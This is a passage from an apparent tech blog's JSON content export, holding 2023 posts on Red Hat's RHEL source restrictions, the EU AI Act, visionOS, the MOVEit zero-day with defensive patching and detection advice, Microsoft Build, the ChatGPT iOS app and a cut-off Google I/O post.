customers. The free ecosystem was Red Hat\u0026rsquo;s best sales funnel.\nImpact on the Enterprise Stack # If you\u0026rsquo;re running infrastructure, this matters to you directly. Millions of servers worldwide run CentOS, Rocky Linux, or AlmaLinux. These distributions are embedded in CI/CD pipelines, container base images, development environments, and production workloads.\nDocker Hub is full of images based on CentOS and its derivatives. Cloud providers offer these distributions as first-class options. The ripple effects of the rebuilders losing access to timely source code will be felt across the entire cloud-native ecosystem.\nFor my own infrastructure work, I\u0026rsquo;ve used CentOS and later Rocky Linux extensively in development environments that mirror RHEL production deployments. The value proposition was simple: identical behavior without the licensing cost for non-production workloads. That model is now under threat.\nThe downstream projects are already exploring alternatives. Rocky Linux has mentioned working with sources obtained through legitimate customer access, and AlmaLinux is evaluating whether to continue tracking RHEL precisely or diverge slightly. But none of these paths are as clean as the previous arrangement.\nThe Bigger Picture: Open Source Sustainability # This move by Red Hat is part of a broader pattern in the open-source world. Companies that built empires on open-source software are increasingly looking for ways to capture more value. MongoDB\u0026rsquo;s switch to SSPL, Elastic\u0026rsquo;s license change, HashiCorp\u0026rsquo;s recent moves with Terraform — the trend is clear.\nThe fundamental tension hasn\u0026rsquo;t changed in 30 years: open source creates enormous value, but capturing that value as a business is genuinely hard. Cloud providers can offer managed versions of open-source databases without contributing back. Competitors can rebuild your distribution without paying for the R\u0026amp;D.\nI sympathize with the business challenge. What I don\u0026rsquo;t sympathize with is the narrative that frames this as anything other than what it is: a company changing the terms of an ecosystem it nurtured, because the original terms became inconvenient. Red Hat built its reputation on open source. IBM acquired Red Hat for $34 billion largely because of that reputation. Now IBM\u0026rsquo;s influence is visible in the prioritization of revenue extraction over community trust.\nMy Take # I\u0026rsquo;ve been using and contributing to Linux distributions since the mid-\u0026rsquo;90s. The strength of the Linux ecosystem has always been its openness — not just legally, but culturally. Red Hat was a cornerstone of that culture.\nThis decision won\u0026rsquo;t kill enterprise Linux. It won\u0026rsquo;t even kill the RHEL-compatible rebuilds; they\u0026rsquo;ll find workarounds. But it damages something harder to quantify: trust. The open-source community operates on a social contract that goes beyond licenses. When a company that owes its existence to that contract starts looking for loopholes, it poisons the well for everyone.\nIf you\u0026rsquo;re making infrastructure decisions right now, it\u0026rsquo;s worth considering what this means for your long-term strategy. Debian and Ubuntu-based stacks look increasingly attractive for workloads where RHEL compatibility isn\u0026rsquo;t strictly required. Diversifying your base OS strategy has never been more prudent.\nThe enterprise Linux landscape is shifting. How it settles will tell us a lot about the future of open source in the corporate era.\nThis post is part of my Developer Landscape series, covering the trends shaping how we build and deploy software.\n","date":"22 June 2023","externalUrl":null,"permalink":"/posts/230622-red-hat-rhel-source-code-controversy/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Red Hat’s decision to restrict public access to RHEL source code sends shockwaves through the enterprise Linux ecosystem and raises fundamental questions about open source sustainability.","title":"Red Hat Locks Down RHEL Source Code — Open Source Has a Trust Problem","type":"posts"},{"content":"Yesterday, the European Parliament voted to approve the AI Act with a decisive majority. It\u0026rsquo;s the first comprehensive regulatory framework for artificial intelligence anywhere in the world, and whether you\u0026rsquo;re building AI systems in Europe or not, this is going to shape how we develop and deploy AI for years to come.\nHaving watched regulation cycles in tech for three decades — from data protection directives to GDPR — I can tell you this vote matters more than most developers realize. The AI Act doesn\u0026rsquo;t just affect the big players. It reaches deep into the development stack.\nThe Risk-Based Framework # The Act classifies AI systems into four risk categories: unacceptable, high, limited, and minimal risk. Unacceptable risk systems — things like social scoring by governments or real-time biometric surveillance in public spaces — are banned outright. High-risk systems face the strictest requirements: think AI used in hiring, credit scoring, law enforcement, or critical infrastructure.\nWhat\u0026rsquo;s interesting from a developer\u0026rsquo;s perspective is the high-risk category. If you\u0026rsquo;re building an AI-powered recruitment screening tool, a medical diagnostic assistant, or an automated loan approval system, you\u0026rsquo;ll need to implement:\nRisk management systems throughout the AI lifecycle Data governance with strict requirements on training data quality Technical documentation that would make most engineering teams sweat Human oversight mechanisms built into the system design Accuracy, robustness, and cybersecurity standards The documentation requirements alone are substantial. You need to be able to explain how your training data was collected, what biases exist, and how you\u0026rsquo;ve mitigated them. For teams used to moving fast and iterating, this is a significant shift in how you approach the development lifecycle.\nGeneral-Purpose AI Models Get Special Treatment # One of the more contentious additions during the parliamentary process was the treatment of general-purpose AI (GPAI) models — essentially foundation models like GPT-4, PaLM, and their open-source counterparts. The Parliament\u0026rsquo;s version requires GPAI providers to:\nDisclose that content was generated by AI Design models to prevent generation of illegal content Publish summaries of copyrighted training data used That last point is going to be particularly thorny. The transparency requirements around training data are something the major AI labs have been actively avoiding. OpenAI, Google, and others have been increasingly opaque about what data goes into their models. The EU is pushing back hard on that.\nFor developers building on top of these foundation models — through APIs, fine-tuning, or otherwise — there\u0026rsquo;s a cascade effect. If the foundation model provider needs to comply, the requirements flow downstream. You\u0026rsquo;ll need to understand what compliance obligations transfer to you as an application developer. Later development of AI Act compliance frameworks would clarify these requirements.\nThe Open Source Question # There\u0026rsquo;s been significant debate about how the Act treats open-source AI. The current text includes some exemptions for open-source components, but the boundaries are fuzzy. If you release an open-source model that gets used in a high-risk application, where does your responsibility end?\nThe Parliament\u0026rsquo;s position seems to be that open-source developers aren\u0026rsquo;t automatically liable for downstream uses, but the trilogue negotiations with the Council and Commission will determine the final language. The GPAI compliance rules that emerged would provide more specific guidance on these obligations. This is something the open-source AI community needs to watch very closely.\nI\u0026rsquo;ve been involved in open-source projects for most of my career, and regulatory uncertainty is poison for community-driven development. Clear carve-outs for open-source research and development are essential, or we risk pushing AI innovation entirely behind corporate walls.\nWhat Happens Next # The parliamentary vote is a major milestone, but it\u0026rsquo;s not the finish line. The trilogue — three-way negotiations between the Parliament, European Council, and European Commission — starts now. This is where the real horse-trading happens. The Council\u0026rsquo;s version of the Act is notably less strict in several areas, so expect some watering down.\nEven after agreement, there\u0026rsquo;s a transition period. Most obligations won\u0026rsquo;t kick in for 18 to 24 months after the final text is adopted. But if you\u0026rsquo;re planning AI-powered products or services, the time to start thinking about compliance architecture is now, not when the clock is ticking.\nMy Take # I\u0026rsquo;ve been through enough regulatory cycles to know that the initial developer reaction is usually panic, followed by resignation, followed by \u0026ldquo;actually, this isn\u0026rsquo;t so bad.\u0026rdquo; GDPR followed exactly that pattern. The companies that took it seriously early gained a competitive advantage.\nThe AI Act will be similar. Yes, the compliance burden is real, especially for high-risk applications. But the frameworks it requires — risk assessment, documentation, human oversight, data governance — are things we should be doing anyway. Most AI failures I\u0026rsquo;ve seen in production trace back to exactly the gaps this regulation targets: poor training data quality, no human fallback, inadequate testing for bias.\nThe developers and teams who build these practices into their workflows now will be ahead of the curve. The ones who wait for the final text and then scramble will be playing catch-up.\nWhether you agree with every provision or not, comprehensive AI regulation was inevitable. The EU fired the first shot. Others will follow. Best to be ready. The practical compliance implications for development teams would only grow more important as the Act took effect.\nThis is part of my ongoing series on AI in Development, tracking how artificial intelligence is reshaping the software engineering landscape.\n","date":"15 June 2023","externalUrl":null,"permalink":"/posts/230615-eu-ai-act-parliament-vote/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The European Parliament’s approval of the AI Act marks the first comprehensive AI regulation framework — here’s what developers building AI systems need to know.","title":"The EU AI Act Passes Parliament — What It Means for Developers","type":"posts"},{"content":"Apple\u0026rsquo;s WWDC keynote on Monday was one of those rare events where you watch a product announcement and genuinely don\u0026rsquo;t know what to think. The Apple Vision Pro is a $3,499 mixed reality headset with an entirely new operating system — visionOS — and a full development SDK. After spending the week digesting the sessions and documentation, I have thoughts. Some excited. Some skeptical. All uncertain.\nThe Hardware Proposition # Let me get the specs out of the way: dual Apple M2 and R1 chips, micro-OLED displays with reportedly stunning resolution, eye tracking, hand tracking, and a spatial audio system. The R1 chip is dedicated to processing sensor data with a claimed 12-millisecond photon-to-display latency, which is critical for avoiding motion sickness.\nAt $3,499, this is clearly a developer kit and early-adopter product disguised as a consumer launch. Apple isn\u0026rsquo;t saying that out loud — they\u0026rsquo;ve positioned it as \u0026ldquo;one more thing\u0026rdquo; with slick marketing — but the pricing tells the story. The interesting question isn\u0026rsquo;t whether consumers will buy this in 2024 when it ships. The interesting question is whether developers will build for it.\nvisionOS: A Genuine Platform Play # This is where WWDC gets interesting from a technical perspective. Apple didn\u0026rsquo;t just slap ARKit onto an iPad strapped to your face. visionOS is a new platform with its own UI paradigms, its own spatial layout system, and deep integration with the existing Apple development ecosystem.\nThe development model comes in three tiers:\nCompatible apps: Existing iPad and iPhone apps run in visionOS with minimal or no modification. They appear as flat windows in the spatial environment. This is Apple\u0026rsquo;s clever way of ensuring the platform has apps from day one — your SwiftUI app probably already works.\nWindow-based spatial apps: Using the new SwiftUI extensions for visionOS, you can create apps with windows that exist in 3D space. Windows can have depth, respond to spatial input (eye tracking + hand gestures), and coexist with other apps in the shared space. If you know SwiftUI, the learning curve here is manageable.\nFully immersive experiences: Using RealityKit and the new RealityKit APIs, you can build fully immersive applications that take over the user\u0026rsquo;s entire visual field. This is the games, training simulations, and specialized professional tools tier.\nThe developer documentation is already comprehensive, and Xcode 15 beta includes a visionOS simulator. Apple has clearly been working on the developer tools for years — the SDK doesn\u0026rsquo;t feel rushed.\nSwiftUI as the Foundation # The most significant technical decision Apple made is centering visionOS development on SwiftUI. If you\u0026rsquo;ve been building iOS apps with UIKit and have been putting off the SwiftUI migration, Apple just gave you a very compelling reason to accelerate that transition.\nThe new spatial APIs extend SwiftUI\u0026rsquo;s declarative model in ways that feel natural. You can add depth to views, create 3D objects using Model3D, and define volumetric windows with WindowGroup using the .volumetric window style. The gesture system extends to spatial interactions — a tap is now a pinch, a long press is a pinch-and-hold, and custom gestures can use eye tracking data.\nFor web developers, Apple also announced that Safari on visionOS supports WebXR, which means web-based spatial experiences are possible without native development. Given how important the web has been for platform adoption historically, this is a smart inclusion.\nThe Developer Economics Question # Here\u0026rsquo;s where my skepticism kicks in. Every new Apple platform starts with a gold rush of developer enthusiasm, followed by the hard reality of user base economics. The Apple Watch went through this cycle — early apps were pulled by major developers when usage didn\u0026rsquo;t justify the investment. Apple TV had a similar trajectory.\nVision Pro at $3,499 will have a small initial user base. Very small. Apple will probably sell it in the hundreds of thousands in the first year, maybe low millions if we\u0026rsquo;re optimistic. That means the addressable market for paid visionOS apps is tiny. The developers who build for it initially will be doing so as a strategic bet, not because the near-term economics make sense.\nThe counterargument is that compatible iPad apps work out of the box, so there\u0026rsquo;s no incremental cost for basic support. And Apple has a track record of driving platform adoption through iterative hardware improvements and price reductions. If Vision Pro follows the trajectory of AirPods — starting premium and eventually becoming mainstream — the early developers will have a significant advantage.\nWhat This Means for Development Teams # If you\u0026rsquo;re leading a software team, here\u0026rsquo;s my pragmatic advice:\nDon\u0026rsquo;t drop everything to build for visionOS. The user base won\u0026rsquo;t justify significant investment for at least 2-3 years. Do invest in SwiftUI if you haven\u0026rsquo;t. It\u0026rsquo;s now clearly Apple\u0026rsquo;s future across all platforms, and visionOS is the strongest signal yet. Evaluate your compatibility story. If you have an iPad app, test it in the visionOS simulator when Xcode 15 is stable. Fix any issues so you\u0026rsquo;re on the platform from launch. Explore if your domain has a spatial computing angle. Data visualization, 3D modeling, remote collaboration, and training are all domains where spatial computing could be genuinely transformative. Watch the enterprise play. Apple is clearly interested in professional use cases — the custom optic inserts for prescription lenses, the emphasis on productivity workflows, and the enterprise management capabilities suggest they see business adoption as important. My Take # I\u0026rsquo;ve watched every major computing platform launch of the last thirty years, and the Vision Pro reveal has a quality that reminds me of the original iPhone announcement. Not because the first product will be perfect — it won\u0026rsquo;t be — but because Apple has clearly thought deeply about the software platform, not just the hardware. The developer tools are mature, the migration path from existing skills is gentle, and the integration with the Apple ecosystem is thorough.\nThat said, I\u0026rsquo;m not buying one on launch day, and I\u0026rsquo;m not pivoting any of my projects to visionOS yet. The smart play is to invest in SwiftUI skills, keep an eye on the developer community\u0026rsquo;s early experiments, and be ready to move when the user base justifies it. Apple has planted a flag in spatial computing. Whether that flag marks the next revolution or another interesting-but-niche platform remains to be seen. The developer tools, at least, suggest Apple is betting heavily on the former.\n","date":"8 June 2023","externalUrl":null,"permalink":"/posts/230608-apple-wwdc-2023-visionos-developer-platform/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Apple announces Vision Pro and visionOS at WWDC 2023, creating an entirely new spatial computing development platform that raises big questions for software teams.","title":"WWDC 2023 — visionOS and What Apple's Spatial Computing Means for Developers","type":"posts"},{"content":"If you\u0026rsquo;re running Progress Software\u0026rsquo;s MOVEit Transfer in your environment, stop reading this and go patch immediately. CVE-2023-34362 is a critical SQL injection vulnerability in MOVEit Transfer\u0026rsquo;s web application that allows unauthenticated attackers to gain access to the database — and it\u0026rsquo;s been actively exploited in the wild since at least late May. This is shaping up to be one of the most significant supply chain security incidents of the year.\nWhat We Know So Far # MOVEit Transfer is a managed file transfer (MFT) solution used by thousands of organizations to move sensitive data between partners, clients, and internal systems. Think payroll data, healthcare records, financial documents — exactly the kind of data that makes attackers salivate.\nThe vulnerability is a SQL injection flaw in the web application component. An unauthenticated attacker can send a crafted request to the MOVEit Transfer web application that results in unauthorized access to the MOVEit database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker can infer information about the structure and contents of the database and execute SQL statements that alter or delete database elements.\nProgress Software released a patch on May 31, along with a detailed advisory. They recommend immediate patching and provide indicators of compromise (IOCs) for organizations to check whether they\u0026rsquo;ve already been compromised. The key IOC to look for is a webshell file named human2.aspx in the wwwroot folder of the MOVEit installation.\nSecurity researchers at Mandiant and Rapid7 have confirmed mass exploitation is underway. The attacks appear to have started as early as May 27, meaning there was a window of at least four days where organizations were being actively compromised before a patch was available.\nThe MFT Attack Surface Problem # This isn\u0026rsquo;t the first time managed file transfer solutions have been targeted in high-profile attacks. In January, the Clop ransomware group exploited a zero-day in Fortra\u0026rsquo;s GoAnywhere MFT, compromising over 130 organizations. Before that, Accellion\u0026rsquo;s legacy FTA product was exploited in 2020-2021, affecting dozens of organizations including Shell, Kroger, and multiple universities.\nMFT solutions are attractive targets for a specific reason: they sit at the boundary of organizations and handle the most sensitive data by design. They\u0026rsquo;re often exposed to the internet (necessarily, for file transfer functionality), and they aggregate data from multiple sources. Compromising an MFT solution is like hitting a data warehouse — you get access to sensitive files from across the organization in a single breach.\nThe pattern is concerning. These products are often legacy enterprise software with codebases that predate modern secure development practices. They handle authentication, file storage, and web interfaces — a large attack surface with complex security requirements. And because they\u0026rsquo;re enterprise infrastructure rather than consumer-facing, they often don\u0026rsquo;t receive the same security scrutiny as more visible products.\nPractical Response Steps # If you have MOVEit Transfer in your environment, here\u0026rsquo;s what you should be doing right now:\nImmediate actions:\nApply the patch from Progress Software. If you can\u0026rsquo;t patch immediately, disable all HTTP and HTTPS traffic to your MOVEit Transfer environment by modifying firewall rules. The file transfer functionality through SFTP/FTP will continue to work. Check for the human2.aspx webshell in your MOVEit installation\u0026rsquo;s wwwroot directory. Review HTTP access logs for unexpected large data downloads or connections from unfamiliar IP addresses. Check for any unexpected files in the MOVEit Transfer directories. Investigation steps:\nReview Azure/IIS logs for evidence of SQL injection attempts — look for unusual query strings containing SQL syntax. Check for any new user accounts that were created without authorization. Examine database audit logs for unexpected queries or data exports. If you find evidence of compromise, assume all data in the MOVEit environment has been exfiltrated and begin your incident response process. The Broader Lesson # I\u0026rsquo;ve been in this industry long enough to feel a deep frustration with the recurring pattern here. Enterprise file transfer products keep getting popped with the same classes of vulnerabilities — SQL injection, authentication bypass, arbitrary file upload. These aren\u0026rsquo;t exotic attack techniques. SQL injection is a solved problem in modern web development frameworks. The fact that it\u0026rsquo;s still appearing in enterprise software handling sensitive data in 2023 reflects a fundamental failure in software quality and security investment.\nFor organizations evaluating their file transfer infrastructure, the question isn\u0026rsquo;t just \u0026ldquo;is our current product patched?\u0026rdquo; It\u0026rsquo;s \u0026ldquo;does our file transfer architecture minimize the blast radius of a compromise?\u0026rdquo; This means thinking about segmentation — can your MFT solution access all your sensitive data, or is it limited to specific transfer jobs? It means thinking about monitoring — are you logging and alerting on unusual data access patterns? And it means thinking about alternatives — do you actually need a centralized MFT solution, or could you use more modern, segmented approaches to file transfer?\nMy Take # Every time one of these MFT vulnerabilities drops, I have the same conversation with colleagues: \u0026ldquo;Why are we still running these things?\u0026rdquo; The answer is always the same — inertia, compliance requirements, partner dependencies, and the sheer difficulty of migrating file transfer workflows that have been running for years.\nBut the risk calculus is changing. Three major MFT zero-days in three years, each resulting in mass exploitation and data theft, should be a wake-up call. If your organization is running MOVEit Transfer, GoAnywhere, or similar legacy MFT products, now is the time to start a serious evaluation of your options — not just patching and moving on until the next zero-day drops.\nIn the short term, patch now. Investigate for compromise. Review your network segmentation around MFT infrastructure. In the longer term, start the conversation about whether your file transfer architecture needs a fundamental rethink. The attackers have clearly identified MFT solutions as high-value targets, and they\u0026rsquo;re not going to stop.\n","date":"1 June 2023","externalUrl":null,"permalink":"/posts/230601-moveit-zero-day-supply-chain-nightmare/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A critical zero-day in Progress MOVEit Transfer is being actively exploited, and the scope of the damage is still emerging.","title":"MOVEit Transfer Zero-Day — Another Supply Chain Nightmare Unfolds","type":"posts"},{"content":"Microsoft Build 2023 just concluded, and after watching the keynotes and digging through the session catalog, one thing is clear: Microsoft is not treating AI as a feature. They\u0026rsquo;re treating it as the platform. Satya Nadella used the phrase \u0026ldquo;Copilot stack\u0026rdquo; repeatedly, describing a layered architecture for building AI-powered applications. Having worked with Azure in various capacities over the years, this feels like the most significant strategic pivot since the original cloud push under Nadella\u0026rsquo;s leadership.\nThe Copilot Stack Explained # The Copilot Stack is Microsoft\u0026rsquo;s framework for how AI applications should be architected. From bottom to top: infrastructure (Azure AI compute), foundation models (OpenAI models via Azure), an AI orchestration layer (centered on Semantic Kernel and prompt management), data grounding (connecting models to your specific data via embeddings and retrieval), and finally the Copilot user experience layer.\nWhat makes this interesting from a DevOps and infrastructure perspective is the orchestration layer. Microsoft is pushing Semantic Kernel — their open-source SDK for integrating LLMs into applications — as the standard way to build AI-augmented workflows. If you\u0026rsquo;ve been using LangChain, Semantic Kernel is Microsoft\u0026rsquo;s answer, with tighter Azure integration and a more opinionated architecture.\nThe plugin system is the other major piece. Microsoft announced that ChatGPT plugins and Bing plugins will be interoperable with Microsoft 365 Copilot. Build a plugin once, and it can surface across ChatGPT, Bing, and the entire Microsoft 365 suite. For enterprise developers, this cross-platform plugin story is genuinely compelling — you don\u0026rsquo;t want to build and maintain separate integrations for every AI surface. This architectural pattern presaged how AI agents would eventually consolidate.\nAzure AI Infrastructure Updates # For teams running AI workloads in production, Build brought several meaningful infrastructure announcements. Azure AI Studio is a new unified portal for building generative AI applications, combining model deployment, prompt engineering, and evaluation tools in one interface.\nThe most practically useful announcement for my work is the Azure OpenAI Service updates. GPT-4 is now generally available on Azure, with enterprise features that the direct OpenAI API doesn\u0026rsquo;t offer: virtual network support, managed identity authentication, content filtering, and data residency guarantees. These infrastructure concerns became even more central as AI governance frameworks like the EU AI Act emerged. If you\u0026rsquo;ve been hesitant about using OpenAI\u0026rsquo;s API for production enterprise workloads due to compliance concerns, Azure\u0026rsquo;s wrapper addresses most of those issues.\nThere\u0026rsquo;s also Prompt Flow, a new tool for building, evaluating, and deploying prompt-based applications. It integrates with Azure DevOps and GitHub Actions for CI/CD of AI applications. The idea of having automated testing for prompt quality in your deployment pipeline is something I\u0026rsquo;ve been implementing manually — having platform support for this is welcome.\nDev Tools: GitHub Copilot Chat and Dev Home # GitHub Copilot Chat is moving out of private preview into public preview. Unlike the original Copilot inline completion, Chat provides a conversational interface within VS Code and Visual Studio for asking questions about your codebase, generating tests, explaining code, and suggesting fixes for errors.\nI\u0026rsquo;ve been using the original Copilot for over a year now, and the chat interface adds a genuinely different dimension. Inline completions are great for the \u0026ldquo;I know what I want to write\u0026rdquo; flow. Chat is better for the \u0026ldquo;I\u0026rsquo;m not sure how to approach this\u0026rdquo; flow. Having both available in the same editor is a productivity multiplier.\nMicrosoft also announced Dev Home, a new Windows application for developer machine setup. It connects to GitHub, manages development environments, and provides a dashboard for monitoring projects. It\u0026rsquo;s open source and extensible. After spending too many hours of my career setting up development environments on new machines, anything that streamlines that process gets my attention.\nFabric and the Data Platform Story # Microsoft Fabric is a unified analytics platform that merges Power BI, Azure Synapse, and Azure Data Factory into a single SaaS product. While this might seem tangential to the AI story, it\u0026rsquo;s actually central — the \u0026ldquo;data grounding\u0026rdquo; layer of the Copilot Stack depends on having your organizational data accessible, indexed, and embeddings-ready.\nFabric introduces a lakehouse architecture with OneLake, a single unified data lake for the entire organization. Every Fabric workload — data engineering, data warehousing, real-time analytics, data science — works against the same underlying storage. The AI integration comes through Copilot in Fabric, which can generate data pipelines, write SQL queries, and create Power BI reports from natural language descriptions.\nMy Take # What impresses me about Microsoft\u0026rsquo;s Build announcements isn\u0026rsquo;t any single product — it\u0026rsquo;s the coherence of the overall platform story. Google I/O last week felt like \u0026ldquo;we added AI to everything.\u0026rdquo; Build feels like \u0026ldquo;we designed a platform for building AI applications, and here\u0026rsquo;s how every piece fits together.\u0026rdquo; This platform thinking continues to evolve, as evidenced by later cloud innovations and infrastructure consolidation.\nThe Copilot Stack architecture is the most clear-headed framework I\u0026rsquo;ve seen for thinking about AI application development. The separation between foundation models, orchestration, data grounding, and UX mirrors how well-architected traditional applications separate concerns — and it gives teams clear layers to work on independently.\nFrom a practical standpoint, if you\u0026rsquo;re an Azure shop, the path to building AI-powered applications just got significantly smoother. The Azure OpenAI Service with enterprise controls, Semantic Kernel for orchestration, Prompt Flow for testing, and Azure DevOps integration for CI/CD creates a complete pipeline. If you\u0026rsquo;re not an Azure shop, this level of platform integration is worth evaluating whether you should be.\nThe competitive dynamics are fascinating. Microsoft has the enterprise distribution, the OpenAI partnership for models, and the developer tools with GitHub and VS Code. That\u0026rsquo;s a formidable combination that neither Google nor AWS can fully match right now. The next year is going to be intense.\n","date":"25 May 2023","externalUrl":null,"permalink":"/posts/230525-microsoft-build-2023-copilot-stack/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Microsoft Build 2023 reveals the ‘Copilot Stack’ — a layered architecture that shows how Microsoft plans to embed AI into every developer workflow.","title":"Microsoft Build 2023 — The Copilot Stack and Azure AI's Big Bet","type":"posts"},{"content":"OpenAI just released the official ChatGPT app for iOS, and while it might seem like a straightforward mobile port, this is actually a significant strategic move. Following ChatGPT\u0026rsquo;s explosive growth and the API\u0026rsquo;s democratization, this mobile app represents the next phase of consumer adoption. After months of third-party ChatGPT wrappers flooding the App Store — many of them charging subscription fees for what amounts to an API wrapper with a markup — OpenAI is taking direct control of the mobile experience. And the implications for developers are more interesting than they might appear at first glance.\nMore Than a Mobile Port # The app itself is polished. It syncs your conversation history across devices, supports voice input through Whisper (OpenAI\u0026rsquo;s speech recognition model), and gives ChatGPT Plus subscribers access to GPT-4. The voice input integration is the standout feature — it\u0026rsquo;s fast, accurate, and makes the interaction feel genuinely different from typing into a chat box on desktop.\nWhat caught my attention as a developer is the Whisper integration. This isn\u0026rsquo;t using Apple\u0026rsquo;s built-in speech recognition. OpenAI is routing voice through their own model, which means they\u0026rsquo;re building a full multimodal input pipeline on mobile. If you\u0026rsquo;ve worked with speech-to-text APIs, you know the quality difference between on-device recognition and a dedicated ML model can be substantial, especially for technical terminology.\nThe app is free to use with GPT-3.5, with GPT-4 access reserved for Plus subscribers at $20/month. This pricing structure is interesting — it\u0026rsquo;s essentially a freemium mobile app backed by some of the most expensive infrastructure in tech. As we\u0026rsquo;d seen with the ChatGPT API\u0026rsquo;s aggressive pricing, OpenAI is clearly prioritizing user acquisition over short-term revenue here.\nThe Third-Party App Problem # Before this launch, searching \u0026ldquo;ChatGPT\u0026rdquo; in the App Store was an exercise in frustration. Dozens of apps with similar names and icons, many charging $7.99/week for subscriptions, most just wrapping the API with minimal added value. Some were outright scams. Apple had started cracking down, but the damage to user trust was real.\nOpenAI\u0026rsquo;s direct entry solves this in the most decisive way possible. It also signals something about the platform dynamics of AI — the model providers are going to want to own the user relationship. Just as Google eventually decided it needed to make its own phones to fully control the Android experience, OpenAI is deciding it can\u0026rsquo;t leave the mobile user experience to third parties.\nFor developers who built legitimate ChatGPT wrapper apps, this is a difficult moment. Some had built real businesses with features like prompt libraries, conversation organization, and workflow integrations. They now need to either differentiate significantly or pivot. It\u0026rsquo;s a pattern I\u0026rsquo;ve seen play out dozens of times — platform owners eventually subsume the most popular third-party use cases.\nVoice as Interface: The Developer Angle # The Whisper integration points toward something I think developers should be paying close attention to: voice is becoming a first-class interface for AI interactions. On a phone, typing long prompts is cumbersome. Speaking is natural. And if the AI can understand you accurately — including code-related terminology — the interaction model changes fundamentally.\nI spent an afternoon testing the voice input with various technical queries. Things like \u0026ldquo;explain the difference between a mutex and a semaphore\u0026rdquo; or \u0026ldquo;write a Python function that implements binary search\u0026rdquo; came through cleanly. It\u0026rsquo;s not perfect — specialized library names sometimes get mangled — but it\u0026rsquo;s remarkably good for a first release.\nThis has implications for how we think about building AI-powered tools. If voice becomes a primary input modality, the prompt engineering patterns we\u0026rsquo;ve developed for text may need adaptation. Spoken language is inherently less structured than typed text, which means the models need to be more tolerant of ambiguity and conversational filler.\nThe Platform Race Heats Up # This launch comes just a week after Google I/O, where Google announced major AI upgrades across its product lineup. Microsoft has been integrating GPT-4 into Bing and Office. And now OpenAI is going directly to consumers on mobile. The race for AI mindshare is entering a new phase. This competitive pressure would accelerate through the DevDay announcements and GPT-4 Turbo.\nFor those of us in the development community, the interesting question is what this means for the API business. OpenAI\u0026rsquo;s API revenue from developers is substantial, but consumer subscriptions could dwarf it if ChatGPT reaches mainstream mobile adoption. Will OpenAI continue to prioritize the developer API, or will consumer features start getting preferential treatment?\nThe history of platform companies suggests consumer will win when there\u0026rsquo;s a conflict. But OpenAI\u0026rsquo;s unique position — needing enterprise and developer revenue to fund the massive compute costs of training frontier models — might keep the API business as a genuine priority. I hope so, because the API is where the real innovation is happening.\nMy Take # I\u0026rsquo;ve been building software long enough to recognize a platform inflection point. The ChatGPT iOS app isn\u0026rsquo;t just about putting a chatbot on phones — it\u0026rsquo;s about establishing AI as a mobile-native interaction paradigm. When voice input works this well combined with a capable language model, you start to see a future where natural language becomes a genuine computing interface, not just a novelty.\nFor developers, my advice is straightforward: start thinking about voice-first AI interactions in your applications. The Whisper API is excellent and reasonably priced. The ChatGPT app will normalize the expectation that AI tools should work on mobile with voice input. Your users are going to start expecting the same from your products.\nAnd if you\u0026rsquo;re currently wrapping the ChatGPT API in a mobile app without significant differentiation — well, it\u0026rsquo;s time to find your unique value proposition. The platform owner just showed up, and they brought Whisper with them.\n","date":"18 May 2023","externalUrl":null,"permalink":"/posts/230518-chatgpt-ios-app-ai-goes-mobile/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI launches the official ChatGPT iOS app, marking AI’s shift from desktop curiosity to mobile-first tool.","title":"ChatGPT Comes to iOS — When AI Goes Mobile-First","type":"posts"},{"content":"Google I/O just wrapped up, and if you blinked you might have missed it — the word \u0026ldquo;AI\u0026rdquo; was mentioned over a hundred times during the keynote. This wasn\u0026rsquo;t a developer conference with some AI sprinkled on top. This was an AI conference that happened to be at Google I/O. Having watched these events for decades, I can tell you: Google is scared, and that fear is producing some genuinely impressive engineering.\nPaLM 2: The Foundation # The headline announcement is PaLM 2, Google\u0026rsquo;s next-generation large language model. What\u0026rsquo;s interesting isn\u0026rsquo;t just the model itself — it\u0026rsquo;s the strategy. Google announced four sizes: Gecko, Otter, Bison, and Unicorn. Gecko is small enough to run on mobile devices, which tells you everything about where Google thinks this is heading.\nPaLM 2 powers over 25 Google products now, including the upgraded Bard. The technical improvements are notable: better multilingual capabilities across over 100 languages, improved reasoning, and significantly better coding abilities. Google claims it was trained on a dataset that included a much larger proportion of multilingual text and source code compared to PaLM 1.\nFrom a developer perspective, the PaLM API is now generally available through Google Cloud\u0026rsquo;s Vertex AI platform. The MakerSuite tool for rapid prototyping is a clear play to capture developers who are currently flocking to the OpenAI API. Having spent a few hours with the documentation already, the developer experience feels more polished than I expected.\nBard Gets Serious # Let\u0026rsquo;s be honest — when Google launched Bard in March, it felt rushed. The demo famously included a factual error, and the product itself was underwhelming compared to ChatGPT. Two months later, Bard is getting a significant upgrade powered by PaLM 2.\nThe most interesting additions are the visual capabilities. Bard can now accept images as input (powered by Google Lens integration), and it\u0026rsquo;s getting integrations with Google Sheets, Maps, and other Workspace products. Google also announced Bard would support coding assistance in over 20 programming languages, with the ability to export code directly to Google Colab.\nWhat I find strategically significant is the Workspace integration. This is Google leveraging its existing distribution advantage — hundreds of millions of Workspace users who could get AI capabilities without switching platforms. It\u0026rsquo;s the same playbook Microsoft is running with Copilot, and it\u0026rsquo;s going to make the next twelve months very interesting.\nDuet AI: The Enterprise Play # Buried beneath the consumer announcements was something that should matter a lot more to those of us building software professionally. Duet AI for Google Cloud is Google\u0026rsquo;s answer to GitHub Copilot and Amazon CodeWhisperer.\nDuet AI promises code completion, generation, and chat-based assistance directly within Google Cloud\u0026rsquo;s IDE integrations. It also extends to infrastructure — helping write Terraform configurations, troubleshoot GKE clusters, and manage Cloud SQL databases through natural language.\nI\u0026rsquo;ve been running workloads on Google Cloud for several projects, and the infrastructure assistance angle is genuinely compelling. Anyone who\u0026rsquo;s ever wrestled with IAM policies or VPC networking configurations knows that context-aware suggestions could save hours of documentation diving. The question is whether Google can deliver on the execution — they have a habit of announcing impressive products at I/O that take a year to become genuinely useful.\nThe Broader Platform Shift # What struck me most about this I/O wasn\u0026rsquo;t any single announcement — it was the totality. Every single product team at Google seems to have been given the mandate to integrate AI. Android 14 gets AI-generated wallpapers. Google Photos gets a 